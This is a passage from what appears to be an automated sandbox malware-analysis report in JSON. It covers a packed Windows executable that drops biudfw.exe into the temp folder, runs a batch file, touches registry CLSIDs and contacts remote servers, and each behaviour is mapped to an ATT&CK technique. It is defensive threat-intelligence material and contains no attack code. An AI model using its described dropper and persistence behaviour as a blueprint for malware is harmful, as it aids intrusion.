\"0d000e0034493d69@SHELL32.dll\"\n \"0d000e00b0493d69@SHELL32.dll\"\n \"0f001000fc6f3d69@ADVAPI32.dll\"\n \"140015003c703d69@ADVAPI32.dll\"\n \"1400150054703d69@ADVAPI32.dll\"\n \"0c000d009c703d69@ADVAPI32.dll\"\n \"0c000d00ac703d69@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005876)\n \"biudfw.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\biudfw.exe\"\" - (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\sanfdr.bat\"\" - (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:11120\"\n \"<IPv4>:11150\"\n \"<IPv4>:11170\"\n \"<IPv4>:11150\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"biudfw.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" file has an entrypoint instructions - \"mov\teax, 0x426014,push\teax,push\tdword ptr fs:[0],mov\tdword ptr fs:[0], esp,xor\teax, eax,mov\tdword ptr [eax], ecx,push\teax,inc\tebp,inc\tebx,outsd\tdx, dword ptr [esi],insd\tdword ptr es:[edi], dx,jo\t0x40570f,arpl\tword ptr [edx + esi], si,lahf\t,sub\tebx, dword ptr [edi - 0x54],aas\t,dec\teax,ljmp\t0x5e19:0xd68b444b,retf\t,jl\t0x405690,mov\tal, 0xce,push\tesi,cld\t,lock xor\tah, byte ptr [edx],stosb\tbyte ptr es:[edi], al,loope\t0x405694,mov\tebp, 0x69db10da,cmc\t,\"\n \"biudfw.exe\" file has an entrypoint instructions - \"mov\teax, 0x426014,push\teax,push\tdword ptr fs:[0],mov\tdword ptr fs:[0], esp,xor\teax, eax,mov\tdword ptr [eax], ecx,push\teax,inc\tebp,inc\tebx,outsd\tdx, dword ptr [esi],insd\tdword ptr es:[edi], dx,jo\t0x40570f,arpl\tword ptr [edx + esi], si,lahf\t,sub\tebx, dword ptr [edi - 0x54],aas\t,dec\teax,ljmp\t0x5e19:0xd68b444b,retf\t,jl\t0x405690,mov\tal, 0xce,push\tesi,cld\t,lock xor\tah, byte ptr [edx],stosb\tbyte ptr es:[edi], al,loope\t0x405694,mov\tebp, 0x69db10da,cmc\t,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" has an executable section named \".text\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" has an executable section named \".rsrc\"\n \"biudfw.exe\" has an executable section named \".text\"\n \"biudfw.exe\" has an executable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" has an writable section named \".text\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" has an writable section named \".rsrc\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" has an writable section named \".reloc\"\n \"biudfw.exe\" has an writable section named \".text\"\n \"biudfw.exe\" has an writable section named \".rsrc\"\n \"biudfw.exe\" has an writable section named \".reloc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"biudfw.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"SHELL32.DLL\" at base 769e0000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"IPHLPAPI.DLL\" at base 72630000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74780000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"DWMAPI.DLL\" at base 74010000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"ADVAPI32.DLL\" at base 764e0000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"KERNEL32.DLL\" at base 75e80000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"OLE32.DLL\" at base 77630000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"CRYPTBASE.DLL\" at base 75840000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"PROPSYS.DLL\" at base 74490000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"COMCTL32.DLL\" at base 74840000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"OLEAUT32.DLL\" at base 76810000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"CLBCATQ.DLL\" at base 77bd0000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74490000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"NTMARTA.DLL\" at base 74db0000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 767f0000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"PROFAPI.DLL\" at base 75960000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"APPHELP.DLL\" at base 757f0000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 71700000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 769e0000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75c30000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75c80000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75e80000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"SETUPAPI.DLL\" at base 76300000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"RPCRT4.DLL\" at base 76160000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"SECUR32.DLL\" at base 75670000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75bb0000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6fd90000\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 757f0000\n \"biudfw.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71fd0000\n \"biudfw.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"biudfw.exe\" loaded module \"KERNEL32\" at base 75e80000\n \"biudfw.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"biudfw.exe\" loaded module \"SHELL32.DLL\" at base 769e0000\n \"biudfw.exe\" loaded module \"IPHLPAPI.DLL\" at base 72630000\n \"biudfw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74780000\n \"biudfw.exe\" loaded module \"DWMAPI.DLL\" at base 74010000\n \"biudfw.exe\" loaded module \"ADVAPI32.DLL\" at base 764e0000\n \"biudfw.exe\" loaded module \"KERNEL32.DLL\" at base 75e80000\n \"biudfw.exe\" loaded module \"DHCPCSVC6.DLL\" at base 71b40000\n \"biudfw.exe\" loaded module \"RPCRT4.DLL\" at base 76160000\n \"biudfw.exe\" loaded module \"DHCPCSVC.DLL\" at base 718d0000\n \"biudfw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73f80000\n \"biudfw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73d40000\n \"biudfw.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 767f0000\n \"biudfw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 737a0000\n \"biudfw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75310000\n \"biudfw.exe\" loaded module \"DNSAPI.DLL\" at base 751d0000\n \"biudfw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73d30000\n \"biudfw.exe\" loaded module \"WS2_32.DLL\" at base 764a0000\n \"biudfw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74e70000\n \"biudfw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 71950000\n \"biudfw.exe\" loaded module \"RASADHLP.DLL\" at base 6d140000\n \"biudfw.exe\" loaded module \"OLE32.DLL\" at base 77630000\n \"biudfw.exe\" loaded module \"CRYPTBASE.DLL\" at base 75840000\n \"biudfw.exe\" loaded module \"PROPSYS.DLL\" at base 74490000\n \"biudfw.exe\" loaded module \"COMCTL32.DLL\" at base 74840000\n \"biudfw.exe\" loaded module \"OLEAUT32.DLL\" at base 76810000\n \"biudfw.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75e80000\n \"biudfw.exe\" loaded module \"SETUPAPI.DLL\" at base 76300000\n \"biudfw.exe\" loaded module \"CLBCATQ.DLL\" at base 77bd0000\n \"biudfw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74490000\n \"biudfw.exe\" loaded module \"NTMARTA.DLL\" at base 74db0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71fd0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 75e80000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\sanfdr.bat (UID: 00000000-00005876)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006040)\n \"biudfw.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006040)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003956)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003956)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003956)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003956)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76160000\n \"biudfw.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76160000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76160000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"biudfw.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"biudfw.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"biudfw.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"biudfw.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"biudfw.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"biudfw.exe\" (UID: 00000000-00006040)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\sanfdr.bat\" \"\" (UID: 00000000-00003956)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"biudfw.exe\" (UID: 00000000-00006040)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\sanfdr.bat\" \"\" (UID: 00000000-00003956)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-220", "type": 9, "relevance": 3, "name": "Executes batch file", "description": "Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\sanfdr.bat\" \"\" (UID: 00000000-00003956)", "origin": "Monitored Target", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" was detected as \"PECompact\" and name: \"Packer\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"biudfw.exe\" was detected as \"PECompact\" and name: \"Packer\"\n \"biudfw.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"biudfw.exe\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"biudfw.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d\" was detected as \"PECompact 2.0x Heuristic Mode -> Jeremy Collake\"\n \"biudfw.exe\" was detected as \"PECompact 2.0x Heuristic Mode -> Jeremy Collake\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"biudfw.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows PECompact2 compressed\"- Location: [%TEMP%\\biudfw.exe]- [targetUID: 00000000-00005876]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" trying to access non-existent 